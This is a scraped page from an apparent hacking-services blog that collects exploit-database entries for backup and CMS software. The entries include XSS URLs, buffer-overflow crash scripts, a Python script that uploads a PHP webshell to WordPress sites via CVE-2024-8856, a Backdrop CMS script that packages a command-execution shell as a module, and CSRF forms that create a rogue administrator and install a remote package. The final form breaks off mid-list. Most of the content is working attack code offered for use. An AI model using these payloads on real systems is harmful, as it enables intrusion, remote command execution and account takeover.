source: https://www.securityfocus.com/bid/47628/info
BackupPC is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.cgi?action=browse&host=localhost&num=99999%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/index.cgi?action=RestoreFile&host=localhost&num=1&share=%3Cscript%3Ealert%28234%29%3C/script%3E&dir=
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863118336
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/53575/info
backupDB() is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
backupDB() 1.2.7a is vulnerable; other versions may also be affected.
http://www.example.com/backupDB/backupDB.php?onlyDB="><script>alert(document.cookie);</script>
# Exploit Title: Acer Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2021-05-19
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 3.0.0.99
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
NTI IScheduleSvc NTI ISch
eduleSvc C:\Program Files (x86)\NTI\Acer Backup Man
ager\IScheduleSvc.exe Auto
# Service info:
C:\>sc qc "NTI IScheduleSvc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NTI IScheduleSvc
TYPE : 110 WIN32_OWN_PROCESS <interactive>
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Acer Backup Manager\IScheduleSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NTI IScheduleSvc
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during application startup or reboot. If successful, the local user's
code would execute with the elevated privileges of the application.
# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.Backup Key Recovery Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Version: 2.2.7.0
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open BackupKeyRecovery.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.Backup Key Recovery Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
#Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-24
#Vendor Homepage: www.nsauditor.com
#Software Link: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
#Tested Version: 2.2.4
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Backup_key_rec_2.2.4.py
#2.- Open backup.txt and copy content to clipboard
#3.- Open Backup Key Recovery
#4.- Select "Register"
#5.- In "Name" paste Clipboard
#6.- In Key type "test"
#7.- Click "Ok"
#8.- Crarshed
cod = "\x41" * 300
f = open('backup.txt', 'w')
f.write(cod)
f.close()
# Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE
# Original Author: Patchstack (hypothetical)
# Exploit Author: Al Baradi Joy
# Exploit Date: April 5, 2025
# Vendor Homepage: https://wp-timecapsule.com/
# Software Link: https://wordpress.org/plugins/wp-time-capsule/
# Version: Up to and including 1.21.16
# Tested Versions: 1.21.16
# CVE ID: CVE-2024-8856
# Vulnerability Type: Arbitrary File Upload / Remote Code Execution
# Description:
# The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16
# allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint.
# This can lead to remote code execution if a PHP file is uploaded and executed directly
# from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory.
# Proof of Concept: Yes
# Categories: WordPress Plugin, File Upload, RCE
# CVSS Score: 9.9 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes:
# Successful exploitation provides shell access as the user running the web server.
# Ensure target is using the vulnerable plugin version before launching the attack.
import requests
# Banner
def display_banner():
print("="*80)
print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging
Plugin Arbitrary File Upload")
print("Made By Al Baradi Joy")
print("="*80)
# Function to detect if the target supports HTTPS or falls back to HTTP
def detect_protocol(domain):
https_url = f"https://{domain}"
http_url = f"http://{domain}"
try:
response = requests.get(https_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[✔] Target supports HTTPS: {https_url}")
return https_url
except requests.exceptions.RequestException:
print("[!] HTTPS not available, falling back to HTTP.")
try:
response = requests.get(http_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[✔] Target supports HTTP: {http_url}")
return http_url
except requests.exceptions.RequestException:
print("[✖] Target is unreachable on both HTTP and HTTPS.")
exit(1)
# Exploit function
def exploit(target_url):
target_url = detect_protocol(target_url.replace("http://",
"").replace("https://", "").strip())
upload_url =
f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php"
shell_url =
f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami"
files = {
'file': ('shell.php', '<?php system($_GET["cmd"]); ?>',
'application/x-php')
}
try:
print(f"[+] Attempting to upload shell to: {upload_url}")
response = requests.post(upload_url, files=files, timeout=10)
if response.status_code == 200:
print(f"[✔] Exploit successful! Webshell available at:
{shell_url}")
else:
print(f"[✖] Failed to upload shell. Status code:
{response.status_code}")
except requests.exceptions.ConnectionError:
print("[✖] Connection failed. Target may be down.")
except requests.exceptions.Timeout:
print("[✖] Request timed out. Target is slow or unresponsive.")
except requests.exceptions.RequestException as e:
print(f"[✖] Unexpected error: {e}")
# Main execution
if __name__ == "__main__":
display_banner()
target = input("[?] Enter the target URL (without http/https):
").strip()
exploit(target)
# Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
# Date: 2020-08-01
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on:
Windows 10.0 x64 Build 10240
Windows 7 x64
Windows Vista x32 SP1
# Replicate Crash:
1) Install and Run the application
2) Run the exploit , the exploit create a text file named payload.txt
3) Press import button and open payload.txt
#!/usr/bin/python
'''
|----------------------------------|
| SEH chain of thread 00000350 |
| Address SE handler |
| 42424242 *** CORRUPT ENTRY *** |
| |
| EIP : 43434343 |
|----------------------------------|
'''
nSEH = "BBBB"
SEH = "CCCC"
payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH
try:
f=open("payload.txt","w")
print("[+] Creating %s bytes payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop Cms
#Version: v1.25.1
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
1. login to account
2. go to http://localhost/backdrop/?q=admin/config/system/site-information
3. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. go to svg file (http://localhost/backdrop/files/malas_2.svg)
Request
POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"
My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"
admin@admin.com
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"
core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"
home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"
form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"
siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"
system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"
Save configuration
------WebKitForm
# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
# Date: 04/27/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://backdropcms.org/
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip
# Version: latest
# Tested on: MacOS
import os
import time
import zipfile
def create_files():
info_content = """
type = module
name = Block
description = Controls the visual building blocks a page is constructed
with. Blocks are boxes of content rendered into an area, or region, of a
web page.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x
configure = admin/structure/block
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
"""
shell_info_path = "shell/shell.info"
os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur
with open(shell_info_path, "w") as file:
file.write(info_content)
shell_content = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
"""
shell_php_path = "shell/shell.php"
with open(shell_php_path, "w") as file:
file.write(shell_content)
return shell_info_path, shell_php_path
def create_zip(info_path, php_path):
zip_filename = "shell.zip"
with zipfile.ZipFile(zip_filename, 'w') as zipf:
zipf.write(info_path, arcname='shell/shell.info')
zipf.write(php_path, arcname='shell/shell.php')
return zip_filename
def main(url):
print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
time.sleep(3)
print("Evil module generating...")
time.sleep(2)
info_path, php_path = create_files()
zip_filename = create_zip(info_path, php_path)
print("Evil module generated!", zip_filename)
time.sleep(2)
print("Go to " + url + "/admin/modules/install and upload the " +
zip_filename + " for Manual Installation.")
time.sleep(2)
print("Your shell address:", url + "/modules/shell/shell.php")
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print("Usage: python script.py [url]")
else:
main(sys.argv[1])
# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field
# Date: 2023-08-21
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://backdropcms.org/
# Version: 1.23.0
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/backdrop/node/add/post
2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.
3- Press "Save" button.
XSS Payload ==> "<script>alert("post_body")</script>
# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Exploit Author: V1n1v131r4
# Date: 2021-09-22
# Vendor Homepage: https://backdropcms.org/
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip
# Version: 1.20.0
# Tested On: Kali Linux, Ubuntu 20.04
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers.
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file.
<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">
<input type="text" name="q" value="admin/people/create">
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
<input type="text" name="name" value="hacker">
<input type="text" name="mail" value="hacker@hacker.com">
<input type="text" name="notify" value="1">
<input type="text" name="pass" value="admin">
<input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">
<input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">
<input type="text" name="form_id" value="user_register_form">
<input type="text" name="status" value="1">
<input type="text" name="roles[administrator]" value="administrator">
<input type="text" name="op" value="Create new account">
<input type="submit" value="Send">
</form>
</body>
</html>
# Step 1
# Send this page below to the victim
<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=system/ajax">
<input type="text" name="q" value="system/ajax">
<input type="text" name="Backdrop.tableDrag.showWeight" value="0">
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
<input type="text" name="bulk" value="">
<input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">
<input type="text" name="files[project_upload]" value="">
<input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">
<input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">
<input type="text" name="form_id" value="installer_manager_install_form">
<input type="text" name="_triggering_element_name" value="op">
<input type="text" name="_triggering_element_value" value="Install">
<input type="text" name="ajax_html_ids[]" value="skip-link">
<input type="text" name="ajax_html_ids[]" value="main-content">
<input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">
<input type="text" name="ajax_html_ids[]" value="edit-search-text">
<input type="text" name="ajax_html_ids[]" value="edit-submit">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">
<input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">
<input type="text" name="ajax_html_ids[]" value="edit-link">
<input type="text" name="ajax_html_ids[]" value="admin-bar">
<input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">
<input type="text" name="ajax_html_ids[]" value="admin-bar-icon">
<input type="text" name="ajax_html_ids[]" value="admin-bar-menu">
<input type="text" name="ajax_html_ids[]" value="admin-bar-extra">
<input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">
<input type="text" name="ajax_html_ids[]" value="ui-id-1">
<input type="text" name="ajax_html_ids[]" value="backdrop-modal">
<input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">
<input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-bulk">
<input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-project-url">
<input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-project-upload">
<input type="text" name="ajax_html_ids[]" value="edit-actions">
<input type="text" name="ajax_html_ids[]" value="edit-submit--2">
<input type="text" name="ajax_page_state[theme]" value="seven">
<input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">
<input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">
<input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">
<input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">
